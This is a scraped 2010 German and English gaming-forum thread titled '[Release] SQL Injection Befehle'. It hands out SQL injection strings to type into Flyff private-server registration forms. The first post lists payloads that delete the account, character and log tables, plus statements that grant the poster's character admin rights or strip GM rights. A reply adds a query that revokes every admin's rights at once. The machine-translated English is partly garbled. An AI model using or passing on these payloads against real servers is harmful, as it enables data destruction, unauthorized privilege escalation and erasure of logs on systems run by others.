|
You last visited: Today at 05:15
Advertisement
[Release] SQL Injection Befehle
Discussion on [Release] SQL Injection Befehle within the Flyff Hacks, Bots, Cheats, Exploits & Macros forum part of the Flyff category.
11/21/2010, 13:13
|
#1
|
elite*gold: 30
Join Date: Oct 2010
Posts: 1,509
Received Thanks: 849
|
[Release] SQL Injection Befehle
Heyho,
Deutsch:
ich hab für euch mal ein paar SQL Injection Befehle rausgesucht:
Quote:
Hier stelle ich mal eine kleine Auflistung der mir bisher bekannten Sql-Injections rein!
Quote:
Löscht die Accountdatenbank
Quote:
|
';delete character_01_tbl;--
|
Löscht die Characterdatenbank
Quote:
|
';delete logging_01_tbl;--
|
Löscht die Loggdatenbank
Quote:
Löscht die Rankingdatenbank
Quote:
Schließt die MSSQL Verbindung!
Quote:
USE [CHARACTER_01_DBF]
UPDATE CHARACTER_TBL SET m_chAuthority='Z'
WHERE m_szName='ACCOUNTID' and serverindex='01'
USE [ACCOUNT_DBF]
UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
WHERE account='CHARACTERNAME' and gamecode='A000'
|
Gibt deinen Charackter Adminrechte!
Damit kann man auch einen Admin GM oder sonstiges mit Ingamerrechten die rechte entziehen,mann muss nur jediglich die AccountID und den Characktername wissen und aus em 'Z' ein 'F' machen!
Wie das funktioniert?
Einfach den Code bei der Regristrierungsseite eingebe,wo normalerweise deine Accountid rein kommt!
|
Das ganze funktioniert nur, wenn die Serverbetreiber Sonderzeichen zulassen!
Das ganze wurde von Frucht auf Core geschrieben. Also Credits zu ihm!
Werde diesen Thread updaten, wenn neue bekannt sind!
English:
Quote:
Today I present a list of SQL injections!
Quote:
|
'; delete account_tbl ;--
|
Deletes the account database
Quote:
|
'; delete character_01_tbl, -
|
Deletes the character database
Quote:
|
'; delete logging_01_tbl, -
|
Clears the log database
Quote:
Deletes the ranking database
Quote:
Closes the MSSQL connection!
Quote:
USE [CHARACTER_01_DBF]
UPDATE SET CHARACTER_TBL m_chAuthority = 'Z'
WHERE m_szName = 'ACCOUNTID' and index server = '01 '
USE [ACCOUNT_DBF]
UPDATE SET ACCOUNT_TBL_DETAIL m_chLoginAuthority = 'Z'
WHERE account = 'CHARACTER NAME' and game code = 'A000'
|
Makes your character to the admin!
So you can also withdraw an admin or other GM Ingamerrechten with the right man only needs to know only the AccountID and Characktername and make the 'Z' a 'F'!
How does it work?
Simply enter the code in the Page tab type where normally your accountid comes in!
|
It works only if the Allow server operators, special symbols
The whole thing was written by fruit to score. So credits to him!
Will update this thread when new ones are announced!
Edit1: English Translation added!
Greez,
Fullscreen
|
|
|
11/25/2010, 19:41
|
#2
|
elite*gold: 74
Join Date: Apr 2009
Posts: 5,908
Received Thanks: 2,386
|
xD muss man das einfach in login schreiben und passwort oder wie? Wenn das so einfach währe lach ich mich tot!
Und was ist GameCode?
|
|
|
11/25/2010, 21:49
|
#3
|
elite*gold: 0
Join Date: Oct 2009
Posts: 1,389
Received Thanks: 199
|
Dann viel Spaß beim Lachen ,
nur jeder hat sonderzeichen raus!
|
|
|
11/26/2010, 13:35
|
#4
|
elite*gold: 30
Join Date: Oct 2010
Posts: 1,509
Received Thanks: 849
|
das hier ist nur für N**b Server gedacht, die zu blöd sind, dass zu fixen.
|
|
|
11/26/2010, 14:30
|
#5
|
elite*gold: 74
Join Date: Apr 2009
Posts: 5,908
Received Thanks: 2,386
|
Wollte mal Fragen für was sind die Befehle da? das man so einfach alles killen kann?
EDIT: Der Fixx ist auch einfach einfach weniger als 10 buchstaben zulassen das ist auch nen Fixx xD
|
|
|
11/26/2010, 21:20
|
#6
|
elite*gold: 30
Join Date: Oct 2010
Posts: 1,509
Received Thanks: 849
|
das sind SQLs, also so etwas wie Batch Dateien auf Windows. Mit ihnen kannst du Servern sagen, was sie machen sollen. Da meist nur der Admin Zugriff auf die Server Database hat, kann er nur selbst Schaden verursachen.
Auf Servern, wo Sonderzeichen gesperrt sind und deine Methode angewandt wurde, geht das nicht.
Greez,
|
|
|
12/01/2010, 11:39
|
#7
|
elite*gold: 0
Join Date: May 2010
Posts: 36
Received Thanks: 3
|
can you translate it to english? please?
|
|
|
12/01/2010, 14:08
|
#8
|
elite*gold: 30
Join Date: Oct 2010
Posts: 1,509
Received Thanks: 849
|
Quote:
|
can you translate it to english? please?
|
Yes, sure
|
|
|
12/01/2010, 16:36
|
#9
|
elite*gold: 0
Join Date: Oct 2010
Posts: 7
Received Thanks: 1
|
ganz nett aber ich denke solche "noob" server die du da in dem text erwähnst gibt es nicht oder nur ganz wenige : ) aber dennoch ...dadurch kann mann wirklich was lernen : ) ich meine nur die leute die einen eigenen server haben ... können sicher etwas damit anfangen
mfg. Skullptura
|
|
|
12/01/2010, 21:50
|
#10
|
elite*gold: 0
Join Date: Aug 2010
Posts: 1
Received Thanks: 0
|
ja toll,bringt sich ur was ...
Quote:
if(strlen($username) < 4 ||
strlen($username) > 10
{
die("Dein Benutzername ist zu kurz/lang .<br>Er muss zwischen <b><u>4 und 10</u></b> Zeichen lang sein .");
}
|
der 'fix' xD
|
|
|
12/20/2010, 17:57
|
#11
|
elite*gold: -5200
Join Date: Jun 2010
Posts: 337
Received Thanks: 160
|
Nixda SQLi -.-
Das ist nur SQL!!
SQLi ist was ganz anderes!
|
|
|
12/29/2010, 02:50
|
#12
|
elite*gold: 0
Join Date: Oct 2004
Posts: 362
Received Thanks: 76
|
Quote:
Originally Posted by .CяeαTiVe
Nixda SQLi -.-
Das ist nur SQL!!
SQLi ist was ganz anderes!
|
will dich ja nur ungern enttäuschen... aber genau das ist sql injection^^
|
|
|
12/29/2010, 07:06
|
#13
|
elite*gold: 0
Join Date: Oct 2006
Posts: 275
Received Thanks: 37
|
can someone that speaks english tell me what exactly this is...i cant really understand his translation
|
|
|
12/31/2010, 15:35
|
#14
|
elite*gold: 0
Join Date: May 2010
Posts: 1
Received Thanks: 0
|
Quote:
UPDATE CHARACTER_TBL SET m_chAuthority='F'
WHERE m_chAuthority='Z'
|
so kann man sehr effektiv allen Admins die Rechte nehmen... unabhängig vom Charnamen...
|
|
|
01/02/2011, 15:14
|
#15
|
elite*gold: 74
Join Date: Apr 2009
Posts: 5,908
Received Thanks: 2,386
|
Wer lässt soviele buchstaben guten das einzigster was auf jeden p Server funtzt ist shutdown.
|
|
|
 |
|
Similar Threads
|
[Release] Einige MSSQL Befehle
02/14/2013 - Flyff PServer Guides & Releases - 55 Replies
.
|
[Release]Gm Ordner (Alle Gm Befehle)
09/10/2010 - Metin2 PServer Guides & Strategies - 7 Replies
Also die meisten gucken ja hier in ElitePvpers oben in den Gm Befehle nach codes.Aber die sind nicht geordnet deshalb habe ich hier mal eienn Gm Ordner mit allen befehle.Sie sind alle geordnet:
Download:
GM_Befehle.rar ... at ul.to - Free File Hosting, Free Image Hosting, Free Music Hosting, Free Video Hosting, ...
Virusscan:
http://www.virustotal.com/file-scan/report.html?i d=6e4dd48faf2f0dd03d6e90e0a2b1ca3a5bfee0ddcd21f7fe b48a2c120f02942c-1284062018
Viel Spaß
|
[Release]GM Befehle verbieten
07/06/2010 - Metin2 PServer Guides & Strategies - 20 Replies
Hi Comm,
ich sah gerade, dass Seedleed shcon einen Thread erstellt hat, wie man GM Codes sperrt, aber den Inhalt wieder gelöscht hat.
Nun zeige ich euch wie es geht.
Es ist eigentlich sehr simple,
ihr müsst den gm befehl in der Gamedatei suchen,
nachdem ihr das gemacht habt, setzt einfach ein
|
Chinesiche GM Befehle + Italian Befehle...kann nix mit anfangen vllt kriegt ihrs hin.
05/18/2009 - Metin2 Private Server - 11 Replies
Blub kann damit nix anfangen villeicht wisst ihrs wenn ihr was raus habt wäre es nett wen ihrs mir per pn oder hier im Thread posten würdet bitte keine lügen oder scheiße labern sowas kann ich auf den Tod nicht ausstehen.
hauter rein Thx könnt ihr geben wenns euch geholfen hat unso...naja viel spass.
Finalmente commandi GM !! Metin2
--- GM COMMAND ---
測試的時候請& #20351;用香港龍駒 8204;試伺服器.
登入測試伺服& #22120;流程如下:
1.安裝香港龍駒 ;主程式
|
All times are GMT +1. The time now is 05:16.
|
|